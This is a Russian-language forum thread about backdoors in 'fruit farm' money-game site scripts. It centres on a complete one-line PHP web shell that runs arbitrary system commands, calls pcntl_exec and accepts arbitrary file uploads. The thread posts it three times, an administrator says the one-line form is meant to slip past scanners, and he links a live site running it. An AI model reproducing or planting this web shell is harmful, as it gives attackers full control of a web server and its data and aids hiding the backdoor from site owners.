Взлом фруктовой фермы

jameson

Администратор
Часто те, кто предлагают услуги по якобы проверке или написанию игры, сами закладывают эти "дырки", чтобы в последующем иметь возможность "сливать" деньги. Часто одним из факторов вычисления таких "программистов" является стоимость его услуг - она очень мала. Несоизмерима с затраченным временем.
Я часто слышал ответы, что нашли дешевле, но в итоге приходили обратно.
Я тебя поправлю немного, чаще всего скрипт сливается в паблик специально как только отработает свое, но при этом никто не задается вопросом зачем? Только в конкретно взятой ситуации вор у вора шапку крадет. В 99% игры, хайпы и прочие "честные" проекты направлены на сбор бабла с лохов (люблю называть вещи своими именами), только лохом в итоге оказывается тот кто решил на этом разводе сэкономить.

Этого достаточно, чтобы ломать твой сайт до бесконечности:

PHP:
<font face="monospace,terminal" size="-1"><pre><?php ob_end_clean(); ob_start(); $disablefuncs = array(); function myshellexec($cmd) { global $disablefuncs; if (empty($cmd)) { return ''; } $result = ''; if (is_callable('exec') and !in_array('exec', $disablefuncs)) { exec($cmd, $result); $result = join("\n", $result); } elseif (($result = `$cmd`) !== FALSE) { } elseif (is_callable('system') and !in_array('system')) { ob_start(); system($cmd); $result = ob_get_contents(); ob_clean(); } elseif (is_callable('passthru') and !in_array('passthru', $disablefuncs)) { ob_start(); passthru($cmd); $result = ob_get_contents(); ob_clean(); } elseif (is_resource($fp = popen($cmd,"r"))) { while(!feof($fp)) { $result .= fread($fp, 1024); } pclose($fp); } else { $result = 'Shit. Can\'t execute command - paranoidal admin[s] has been disabled many functions!'; } return $result; } if (is_callable('ini_get')) { $disablefuncs = ini_get("disable_functions"); if (!empty($disablefuncs)) { $disablefuncs = str_replace(' ', '', $disablefuncs); $disablefuncs = explode(',', $disablefuncs); } else { $disablefuncs = array(); } } if (isset($_POST['execl'])) { echo $_POST['execl']. '<br>'; echo myshellexec($_POST['execl']); } if (isset($_POST['pcntl_exec'])) { pcntl_exec($_POST['pcntl_exec'], $_POST['pcntl_exec_param']); } if (isset($_FILES['upfile'])) { if (is_uploaded_file($_FILES['upfile']['tmp_name'])) { move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST['fname']); echo '<b>Uploaded!</b>'; } } ?><br></pre><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">/bin/bash: <input type="text" name="execl" id="bash" style="width:80%"><input type="submit"></form><br><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">pcntl_exec: <input type="text" name="pcntl_exec" style="width:200px"><input type="text" name="pcntl_exec_param" style="width:70%"><input type="submit"></form><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>" enctype="multipart/form-data">upload: <input type="text" name="fname" style="width:200px" value="LOX.png"><input type="file" name="upfile" style="width:70%"><input type="submit"></form><script>document.getElementById("bash").focus();</script></font><?php $text = str_replace("\n", '<br />', ob_get_contents()); ob_end_clean(); echo $text; ?>
и хрен какой сканер его так сразу срисует..

@pligin поправь меня если я не прав? Код написан в одну строку спецом.
 

pligin

Команда форума
Администратор
Я тебя поправлю немного, чаще всего скрипт сливается в паблик специально как только отработает свое, но при этом никто не задается вопросом зачем? Только в конкретно взятой ситуации вор у вора шапку крадет. В 99% игры, хайпы и прочие "честные" проекты направлены на сбор бабла с лохов (люблю называть вещи своими именами), только лохом в итоге оказывается тот кто решил на этом разводе сэкономить.

Этого достаточно, чтобы ломать твой сайт до бесконечности:

PHP:
<font face="monospace,terminal" size="-1"><pre><?php ob_end_clean(); ob_start(); $disablefuncs = array(); function myshellexec($cmd) { global $disablefuncs; if (empty($cmd)) { return ''; } $result = ''; if (is_callable('exec') and !in_array('exec', $disablefuncs)) { exec($cmd, $result); $result = join("\n", $result); } elseif (($result = `$cmd`) !== FALSE) { } elseif (is_callable('system') and !in_array('system')) { ob_start(); system($cmd); $result = ob_get_contents(); ob_clean(); } elseif (is_callable('passthru') and !in_array('passthru', $disablefuncs)) { ob_start(); passthru($cmd); $result = ob_get_contents(); ob_clean(); } elseif (is_resource($fp = popen($cmd,"r"))) { while(!feof($fp)) { $result .= fread($fp, 1024); } pclose($fp); } else { $result = 'Shit. Can\'t execute command - paranoidal admin[s] has been disabled many functions!'; } return $result; } if (is_callable('ini_get')) { $disablefuncs = ini_get("disable_functions"); if (!empty($disablefuncs)) { $disablefuncs = str_replace(' ', '', $disablefuncs); $disablefuncs = explode(',', $disablefuncs); } else { $disablefuncs = array(); } } if (isset($_POST['execl'])) { echo $_POST['execl']. '<br>'; echo myshellexec($_POST['execl']); } if (isset($_POST['pcntl_exec'])) { pcntl_exec($_POST['pcntl_exec'], $_POST['pcntl_exec_param']); } if (isset($_FILES['upfile'])) { if (is_uploaded_file($_FILES['upfile']['tmp_name'])) { move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST['fname']); echo '<b>Uploaded!</b>'; } } ?><br></pre><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">/bin/bash: <input type="text" name="execl" id="bash" style="width:80%"><input type="submit"></form><br><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">pcntl_exec: <input type="text" name="pcntl_exec" style="width:200px"><input type="text" name="pcntl_exec_param" style="width:70%"><input type="submit"></form><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>" enctype="multipart/form-data">upload: <input type="text" name="fname" style="width:200px" value="LOX.png"><input type="file" name="upfile" style="width:70%"><input type="submit"></form><script>document.getElementById("bash").focus();</script></font><?php $text = str_replace("\n", '<br />', ob_get_contents()); ob_end_clean(); echo $text; ?>
и хрен какой сканер его так сразу срисует..

@pligin поправь меня если я не прав? Код написан в одну строку спецом.
я про то и говорю, что только ручками перебрав все файлы можно что-то отыскать. а это дохрена времени занимает
 

byba

Участник
Я тебя поправлю немного, чаще всего скрипт сливается в паблик специально как только отработает свое, но при этом никто не задается вопросом зачем? Только в конкретно взятой ситуации вор у вора шапку крадет. В 99% игры, хайпы и прочие "честные" проекты направлены на сбор бабла с лохов (люблю называть вещи своими именами), только лохом в итоге оказывается тот кто решил на этом разводе сэкономить.

Этого достаточно, чтобы ломать твой сайт до бесконечности:

PHP:
<font face="monospace,terminal" size="-1"><pre><?php ob_end_clean(); ob_start(); $disablefuncs = array(); function myshellexec($cmd) { global $disablefuncs; if (empty($cmd)) { return ''; } $result = ''; if (is_callable('exec') and !in_array('exec', $disablefuncs)) { exec($cmd, $result); $result = join("\n", $result); } elseif (($result = `$cmd`) !== FALSE) { } elseif (is_callable('system') and !in_array('system')) { ob_start(); system($cmd); $result = ob_get_contents(); ob_clean(); } elseif (is_callable('passthru') and !in_array('passthru', $disablefuncs)) { ob_start(); passthru($cmd); $result = ob_get_contents(); ob_clean(); } elseif (is_resource($fp = popen($cmd,"r"))) { while(!feof($fp)) { $result .= fread($fp, 1024); } pclose($fp); } else { $result = 'Shit. Can\'t execute command - paranoidal admin[s] has been disabled many functions!'; } return $result; } if (is_callable('ini_get')) { $disablefuncs = ini_get("disable_functions"); if (!empty($disablefuncs)) { $disablefuncs = str_replace(' ', '', $disablefuncs); $disablefuncs = explode(',', $disablefuncs); } else { $disablefuncs = array(); } } if (isset($_POST['execl'])) { echo $_POST['execl']. '<br>'; echo myshellexec($_POST['execl']); } if (isset($_POST['pcntl_exec'])) { pcntl_exec($_POST['pcntl_exec'], $_POST['pcntl_exec_param']); } if (isset($_FILES['upfile'])) { if (is_uploaded_file($_FILES['upfile']['tmp_name'])) { move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST['fname']); echo '<b>Uploaded!</b>'; } } ?><br></pre><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">/bin/bash: <input type="text" name="execl" id="bash" style="width:80%"><input type="submit"></form><br><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">pcntl_exec: <input type="text" name="pcntl_exec" style="width:200px"><input type="text" name="pcntl_exec_param" style="width:70%"><input type="submit"></form><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>" enctype="multipart/form-data">upload: <input type="text" name="fname" style="width:200px" value="LOX.png"><input type="file" name="upfile" style="width:70%"><input type="submit"></form><script>document.getElementById("bash").focus();</script></font><?php $text = str_replace("\n", '<br />', ob_get_contents()); ob_end_clean(); echo $text; ?>
и хрен какой сканер его так сразу срисует..

@pligin поправь меня если я не прав? Код написан в одну строку спецом.
Можно хотя бы в общих чертах узнать что этот код будет проделывать? Какая его смысловая нагрузка так сказать?Не пинайте если че я не кодер
 

pligin

Команда форума
Администратор
Так у меня еще нет фермы, куда копировать то :oops: лучше так раскажите
а зачем для этого ферма? сделай файл php на сервере/хостинге и скопируй туда эту строку. ну и посмотри, что она сделает
 

jameson

Администратор
а зачем для этого ферма? сделай файл php на сервере/хостинге и скопируй туда эту строку. ну и посмотри, что она сделает
https://omarket.club

сайт и пользователь изолированы каталогом и правами - творите что хотите на нем, код запятая в запятую из моего примера.

Только вывести его можно на любой странице, даже о существовании которой ты не подозреваешь.

пруф что это тот же код:

Screenshot.png
 

byba

Участник
Запустил на Оупен сервере увидел туже картинку что по ссылке https://omarket.club/ :oops: походу надо завязывать с фермами пока не слили под ноль
 

pligin

Команда форума
Администратор
Запустил на Оупен сервере увидел туже картинку что по ссылке https://omarket.club/:oops: походу надо завязывать с фермами пока не слили под ноль
можешь обратиться за норм скриптом. есть готовый рип мотормани - много интересных плюшек, ну и серфинг скоро в него воткну новый. все вышеописанное в комплект не входит)
 
Верх